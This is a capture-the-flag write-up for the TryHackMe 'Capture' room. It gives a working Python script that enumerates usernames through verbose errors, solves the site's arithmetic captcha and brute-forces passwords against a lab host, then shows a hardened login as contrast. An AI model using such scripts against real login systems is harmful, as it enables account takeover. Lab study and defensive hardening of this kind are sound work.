
TryHackMe - Capture

 ·  ☕ 2 min read  ·  ✍️ azadin


Can you bypass the login form?

Title: Capture
Description: Can you bypass the login form?
Points: 30
Difficulty: Easy
Maker: toxicat0r

Summary

In this machine we are given a list of usernames and passwords. We notice that the errors on the login page are quite verbose, which allows user enumeration; from that we obtain the valid users, which we then use to brute-force the passwords. There is, however, a check against enumeration which must be bypassed.


Description

SecureSolaCoders has once again developed a web application. They were tired of hackers enumerating and exploiting their previous login form. They thought a Web Application Firewall (WAF) was too overkill and unnecessary, so they developed their own rate limiter and modified the code slightly.

Solve

After trying a random user and password from the lists we were given, the error says: Invalid username. After a certain number of attempts we start getting captchas to solve, so we automate the process using Python:

import operator
import re
import sys

import requests

url = "http://10.10.121.107/login"

with open("usernames.txt", "rt") as fd:
    usernames = fd.read().splitlines()

with open("passwords.txt", "rt") as fd:
    passwords = fd.read().splitlines()

# The home-made rate limiter answers with a small arithmetic captcha
# embedded in the page, e.g. "12 + 7 = ?"; capture both operands and the operator.
regex = re.compile(r"(\d+)\s([+*/-])\s(\d+)\s=\s\?")

# Evaluate the captured expression with an operator table instead of eval()
operators = {
    "+": operator.add,
    "-": operator.sub,
    "*": operator.mul,
    "/": operator.truediv,
}


def send_post(username, password, captcha=None):
    data = {"username": username, "password": password}
    if captcha is not None:
        data["captcha"] = captcha
    return requests.post(url=url, data=data)


def solve_captcha(response):
    """Return the answer to the captcha on the page, or None if there is none."""
    match = regex.search(response.text)
    if match is None:
        return None
    left, op, right = match.groups()
    return operators[op](int(left), int(right))


# Burn through the free attempts with junk credentials until the server
# starts sending captchas, so that we are in sync with its next challenge.
captcha = None
for _ in range(100):
    response = send_post("darthvader", "lukesfather")
    captcha = solve_captcha(response)
    if captcha is not None:
        print(f"Captcha synchronised! Next solution is: {captcha}")
        break

# The verbose error message tells valid usernames apart from unknown ones;
# every response carries the captcha for the following request.
for username in usernames:
    response = send_post(username, "None", captcha)
    captcha = solve_captcha(response)
    if "does not exist" in response.text:
        continue
    for password in passwords:
        response = send_post(username, password, captcha)
        if "Error" not in response.text:
            print(f"Success! Username:{username} Password:{password}")
            sys.exit(0)
        captcha = solve_captcha(response)

This should get you the correct credentials to log in and grab the flag.
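For contrast, here is how the room's login could have been written so that the script above gets nothing back. This is an added example, not code from the room or from this writeup; the user store, the credentials and the limits are constructed. It puts the verbose check the script exploits next to a variant that returns one message for every failure, spends the same hashing work on unknown users (no timing oracle), and rate-limits failures both per source address and per username, so that one address walking a username list is cut off after a handful of attempts.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict, deque


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed user store: username -> (salt, PBKDF2 digest)
_SALT = os.urandom(16)
USERS = {"alice": (_SALT, _hash("correct horse", _SALT))}
# Dummy record so an unknown username costs exactly one PBKDF2 run as well
_DUMMY = (_SALT, _hash("unused", _SALT))


def login_verbose(username: str, password: str) -> str:
    """The pattern the room exploits: the message reveals whether the user exists."""
    if username not in USERS:
        return "Error: user does not exist"
    salt, digest = USERS[username]
    if not hmac.compare_digest(_hash(password, salt), digest):
        return "Error: invalid password"
    return "OK"


class LoginService:
    """Hardened variant: one generic message, equal work for unknown users,
    and a sliding-window failure limit keyed by source IP and by username."""

    def __init__(self, max_attempts: int = 5, window: int = 300):
        self.max_attempts, self.window = max_attempts, window
        self.failures = defaultdict(deque)  # key -> timestamps of failures

    def _limited(self, key, now: float) -> bool:
        q = self.failures[key]
        while q and now - q[0] > self.window:  # drop failures outside the window
            q.popleft()
        return len(q) >= self.max_attempts

    def login(self, source_ip: str, username: str, password: str, now=None) -> str:
        now = time.time() if now is None else now
        keys = (("ip", source_ip), ("user", username))
        if any(self._limited(k, now) for k in keys):
            return "Too many attempts, try again later"
        salt, digest = USERS.get(username, _DUMMY)  # always hash, even for unknown users
        ok = username in USERS and hmac.compare_digest(_hash(password, salt), digest)
        if not ok:
            for k in keys:
                self.failures[k].append(now)
            return "Invalid username or password"
        return "OK"
```

With the hardened service, the enumeration step of the script has no signal to work with, and the per-IP window stops it after `max_attempts` failures whatever usernames it tries.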
